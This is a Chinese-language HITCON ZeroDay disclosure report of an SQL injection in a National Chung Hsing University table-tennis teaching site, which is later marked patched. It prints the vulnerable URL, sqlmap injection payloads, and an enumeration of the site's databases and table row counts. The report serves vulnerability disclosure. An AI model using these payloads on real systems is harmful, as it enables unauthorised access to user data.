Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00404
- 發信 Vendor: 國立中興大學
- Title: 国立中兴大学某站SQL
- Introduction: 国立中兴大学桌球教学系统SQL
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2018/04/06 23:45:51 : 新提交 (由 Cra5h 更新此狀態)
- 2018/04/07 00:27:15 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:03:33 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:03:34 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:03:35 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/06/06 03:00:19 : 公開 (由 HITCON ZeroDay 平台自動更新)
- 2018/11/16 18:10:06 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/11/24 03:00:21 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00404
- 通報者:cra5h (Cra5h)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
国立中兴大学桌球教学系统SQL
SQL位置:
http://tt.sim.nchu.edu.tw/index.php?bid=32
bid参数过滤不严导致SQL产生
sqlmap resumed the following injection point(s) from stored session:
Parameter: bid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bid=32 AND 3020=3020
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: bid=32 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: bid=-6592 UNION ALL SELECT NULL,CONCAT(0x717a6a6b71,0x444e47495754504e42534a5775626f6e5553766675664d48444a4262455874655662646a464f4c42,0x7171716271),NULL,NULL,NULL,NULL-- jFLN[23:04:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, Microsoft IIS 7.0, PHP 5.2.8
back-end DBMS: MySQL >= 5.0.12
[23:04:20] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\tt.sim.nchu.edu.tw'
确认影响库:(9库)
available databases [9]:
[] chu_phytest
[] demo_phytest
[] information_schema
[] phytest
[] phytest2
[] phytest3
[] sport
[] test
[*] volleyball
[23:06:17] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\tt.sim.nchu.edu.tw'
查看数据量:
Database: demo_phytest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 4371 |
| sniffer | 1015 |
| option_data43 | 492 |
| user | 377 |
| userdata | 371 |
| score | 348 |
| option_data44 | 234 |
| option_data42 | 200 |
| question_data43 | 145 |
| exam_question | 80 |
| question_data44 | 74 |
| question_data42 | 66 |
| level | 63 |
| purview | 32 |
| functions | 27 |
| photoshow | 20 |
| title | 18 |
| bulletin | 14 |
| downloads | 13 |
| exam_data | 12 |
| exam_index | 12 |
| changepassword | 11 |
| modules | 7 |
| title_downloads | 6 |
| exam_history | 5 |
| unit | 5 |
| links | 4 |
| group | 3 |
| content | 3 |
| chapter | 2 |
| announce | 1 |
| counter | 1 |
| online | 1 |
| simulate_data | 1 |
| simulate_index | 1 |
+---------------------------------------+---------+
Database: phytest3
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 208 |
| option_data18 | 154 |
| option_data16 | 142 |
| option_data17 | 114 |
| question_data18 | 65 |
| question_data16 | 61 |
| question_data17 | 48 |
| option_data20 | 27 |
| option_data19 | 25 |
| functions | 22 |
| option_data21 | 17 |
| purview | 15 |
| question_data19 | 10 |
| question_data20 | 9 |
| modules | 7 |
| question_data21 | 7 |
| chapter | 6 |
| user | 4 |
| simulate_question | 4 |
| userdata | 4 |
| group | 3 |
| online | 2 |
| tutorialdir | 2 |
| announce | 1 |
| simulate_data | 1 |
| simulate_index | 1 |
+---------------------------------------+---------+
Database: phytest2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 565 |
| simulate_question | 415 |
| user | 170 |
| option_data26 | 106 |
| option_data33 | 100 |
| userdata | 92 |
| option_data35 | 62 |
| option_data22 | 47 |
| option_data24 | 44 |
| option_data30 | 44 |
| practice_result | 42 |
| question_data33 | 38 |
| option_data23 | 36 |
| option_data18 | 34 |
| question_data26 | 34 |
| simulate_data | 33 |
| simulate_index | 33 |
| option_data25 | 32 |
| option_data19 | 31 |
| option_data20 | 28 |
| functions | 22 |
| option_data28 | 22 |
| question_data35 | 22 |
| option_data21 | 20 |
| chapter | 19 |
| question_data30 | 19 |
| option_data27 | 18 |
| purview | 16 |
| question_data22 | 16 |
| question_data24 | 15 |
| question_data18 | 12 |
| question_data23 | 12 |
| question_data25 | 12 |
| option_data16 | 10 |
| option_data29 | 10 |
| question_data19 | 10 |
| question_data20 | 10 |
| modules | 7 |
| question_data28 | 6 |
| question_data29 | 6 |
| question_data27 | 5 |
| option_data34 | 4 |
| question_data21 | 4 |
| question_data16 | 3 |
| group | 2 |
| announce | 2 |
| option_data17 | 2 |
| question_data17 | 1 |
| question_data34 | 1 |
+---------------------------------------+---------+
Database: volleyball
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 4607 |
| sniffer | 1945 |
| option_data43 | 492 |
| option_data42 | 197 |
| question_data43 | 145 |
| option_data57 | 71 |
| question_data42 | 65 |
| option_data55 | 62 |
| user | 56 |
| userdata | 55 |
| level | 52 |
| option_data53 | 52 |
| option_data59 | 48 |
| option_data50 | 46 |
| option_data54 | 45 |
| option_data49 | 44 |
| option_data52 | 44 |
| option_data58 | 43 |
| option_data51 | 40 |
| option_data61 | 38 |
| purview | 32 |
| functions | 27 |
| question_data57 | 25 |
| title | 21 |
| question_data55 | 17 |
| question_data53 | 16 |
| question_data49 | 15 |
| question_data50 | 14 |
| bulletin | 13 |
| question_data52 | 13 |
| question_data54 | 13 |
| question_data59 | 13 |
| question_data51 | 12 |
| unit | 12 |
| chapter | 11 |
| downloads | 11 |
| question_data58 | 11 |
| question_data61 | 10 |
| modules | 7 |
| photoshow | 5 |
| links | 4 |
| title_downloads | 4 |
| group | 3 |
| content | 3 |
| changepassword | 2 |
| counter | 1 |
| online | 1 |
+---------------------------------------+---------+
Database: chu_phytest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| option_data43 | 492 |
| option_data44 | 220 |
| option_data42 | 197 |
| question_data43 | 145 |
| question_data44 | 70 |
| question_data42 | 65 |
| title | 54 |
| purview | 30 |
| functions | 26 |
| exam_question | 20 |
| downloads | 13 |
| unit | 10 |
| modules | 7 |
| title_downloads | 6 |
| links | 4 |
| chapter | 3 |
| content | 3 |
| user | 2 |
| userdata | 2 |
| announce | 1 |
| exam_data | 1 |
| exam_index | 1 |
| online | 1 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| question_index | 4111 |
| option_data43 | 275 |
| option_data42 | 144 |
| user | 135 |
| userdata | 135 |
| level | 130 |
| question_data43 | 73 |
| question_data42 | 46 |
| purview | 29 |
| exam_question | 25 |
| functions | 22 |
| modules | 7 |
| group | 3 |
| chapter | 3 |
| exam_data | 3 |
| exam_index | 3 |
| announce | 1 |
| online | 1 |
| simulate_data | 1 |
| simulate_index | 1 |
+---------------------------------------+---------+
Database: phytest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| sniffer | 10511 |
| question_index | 4532 |
| option_data43 | 499 |
| user | 323 |
| level | 316 |
| userdata | 316 |
| option_data42 | 206 |
| question_data43 | 148 |
| changepassword | 141 |
| option_data48 | 81 |
| option_data53 | 80 |
| question_data42 | 68 |
| title | 64 |
| option_data55 | 55 |
| option_data54 | 53 |
| photoshow | 52 |
| option_data47 | 47 |
| option_data51 | 38 |
| purview | 32 |
| option_data49 | 29 |
| option_data50 | 28 |
| functions | 27 |
| question_data53 | 25 |
| question_data48 | 23 |
| bulletin | 22 |
| question_data54 | 16 |
| question_data51 | 15 |
| question_data55 | 15 |
| downloads | 14 |
| question_data47 | 14 |
| question_data50 | 11 |
| unit | 11 |
| chapter | 10 |
| question_data49 | 8 |
| modules | 7 |
| title_downloads | 7 |
| links | 5 |
| group | 3 |
| content | 3 |
| counter | 1 |
| online | 1 |
| simulate_data | 1 |
| simulate_index | 1 |
+---------------------------------------+---------+
Database: sport
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| member | 162 |
| rule | 139 |
| rulecpic | 89 |
| judgetechpic | 84 |
| rulepic | 51 |
| casediscussionre | 27 |
| sign | 25 |
| judgetech | 16 |
| rulec | 14 |
| bulletin | 13 |
| casediscussion | 13 |
| judgetechvedio | 13 |
| discussion | 11 |
| discussionre | 9 |
| downloads | 8 |
| connection | 7 |
| team | 7 |
| recordspic | 2 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2503 |
| PARTITIONS | 423 |
| TABLES | 423 |
| STATISTICS | 405 |
| KEY_COLUMN_USAGE | 397 |
| TABLE_CONSTRAINTS | 390 |
| SESSION_VARIABLES | 321 |
| GLOBAL_STATUS | 310 |
| GLOBAL_VARIABLES | 310 |
| SESSION_STATUS | 310 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195 |
| COLLATIONS | 195 |
| SCHEMA_PRIVILEGES | 45 |
| CHARACTER_SETS | 39 |
| PLUGINS | 20 |
| ENGINES | 9 |
| SCHEMATA | 9 |
| REFERENTIAL_CONSTRAINTS | 8 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
[23:11:16] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\tt.sim.nchu.edu.tw'
修補建議
过滤,参数化